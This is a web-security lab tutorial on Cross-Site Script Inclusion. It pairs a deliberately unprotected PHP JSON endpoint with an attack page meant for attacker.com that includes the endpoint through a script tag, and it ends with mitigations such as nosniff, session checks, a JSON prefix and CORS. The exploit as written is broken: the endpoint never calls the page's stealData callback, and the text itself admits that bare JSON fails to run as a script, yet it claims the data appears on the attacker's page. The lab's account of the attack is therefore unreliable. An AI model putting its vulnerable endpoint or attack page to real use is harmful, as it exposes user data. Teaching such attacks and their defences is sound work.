Objective
Understand and exploit Cross-Site Script Inclusion (XSSI) vulnerabilities to steal sensitive information exposed through JSON responses and learn effective mitigation strategies.
Scenario
You’re performing a security assessment on a web application that serves sensitive user data via a JSON API endpoint. Due to a lack of proper access controls and security headers, this endpoint can be exploited through a Cross-Site Script Inclusion (XSSI) attack. Your goal is to exploit this vulnerability to extract sensitive data and understand how to secure applications against such attacks.
Lab Setup
Prerequisites:
- Basic knowledge of HTML, JavaScript, and JSON.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP and MySQL support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
PHP Script for JSON Response
Create a file data.php:
<?php
header('Content-Type: application/json');
$user_data = [
"username" => "victim",
"email" => "[email protected]",
"balance" => "1000"
];
echo json_encode($user_data);
?>
Running the Application
Start your Apache server.
Place data.php in the web server’s root directory (htdocs for XAMPP).
Open http://localhost/data.php in your browser.
Expected Result:
{
"username": "victim",
"email": "[email protected]",
"balance": "1000"
}
Exploitation Steps
Crafting the Malicious Page
Create a file xssi_attack.html with the following content:
<html>
<body>
<h2>Stealing JSON Data...</h2>
<script>
function stealData(data) {
document.body.innerHTML += '<pre>' + data + '</pre>';
}
</script>
<script src="http://localhost/data.php"></script>
</body>
</html>
Host xssi_attack.html on any server (e.g., http://attacker.com/xssi_attack.html).
When a victim visits the attacker’s page, the JSON data from data.php will be displayed.
Expected Result:
- The sensitive JSON data appears on the attacker’s page, demonstrating the data leak.
Explanation
- Browsers treat <script> tags as JavaScript, and the same-origin policy does not stop a page from including a script hosted on another origin: the browser fetches it with the victim’s cookies and runs whatever comes back inside the attacker’s page.
- What actually leaks depends on the response being executable JavaScript. A response that calls back into the including page (a JSONP-style callback such as stealData({...})) hands its contents to that page, whereas a bare JSON object literal is a syntax error when parsed as a script. The mitigations below therefore aim at making the response unusable as a script at all, whatever its shape.
Solution and Prevention
Problem Analysis
- The server returns JSON data without any protection, allowing cross-domain inclusion.
Fixing the Vulnerability
Set X-Content-Type-Options Header
With nosniff, the browser refuses to execute a <script src> include whose Content-Type is not a JavaScript MIME type, so the JSON is never run as a script:
<?php
header('Content-Type: application/json');
header('X-Content-Type-Options: nosniff');
$user_data = [
"username" => "victim",
"email" => "[email protected]",
"balance" => "1000"
];
echo json_encode($user_data);
?>
Require Authentication for JSON Endpoints
Implement session checks or API tokens to restrict access.
<?php
session_start();
header('Content-Type: application/json');
header('X-Content-Type-Options: nosniff');
// Refuse to serve user data unless the caller has an authenticated session.
if (!isset($_SESSION['user_id'])) {
    http_response_code(403);
    echo json_encode(["error" => "Unauthorized access"]);
    exit();
}
// Authenticated: build and return $user_data as in data.php above.
Prefix JSON Responses with Non-Executable Content
Add a harmless prefix to prevent script execution:
// The prefix makes the body a JavaScript syntax error when pulled in via <script src>.
// Legitimate same-origin clients must strip these characters before calling JSON.parse.
echo ")]}',\n";
echo json_encode($user_data);
Use CORS Policies
Set Cross-Origin Resource Sharing (CORS) headers so that only an allowlisted origin may read the response from scripts (fetch/XMLHttpRequest). Note that CORS does not by itself stop a <script src> include, so pair it with nosniff and authentication, and never reflect an arbitrary Origin value:
header('Access-Control-Allow-Origin: https://trusted-domain.com');
Testing After Fix
- Reload the attack page (xssi_attack.html).
- Observe that the JSON data is no longer exposed or processed due to the security headers and access controls.
Conclusion
In this lab, you exploited a Cross-Site Script Inclusion (XSSI) vulnerability to steal sensitive data from a JSON endpoint. You also learned how to secure JSON responses using security headers, access controls, and data protection techniques to prevent unauthorized data exposure.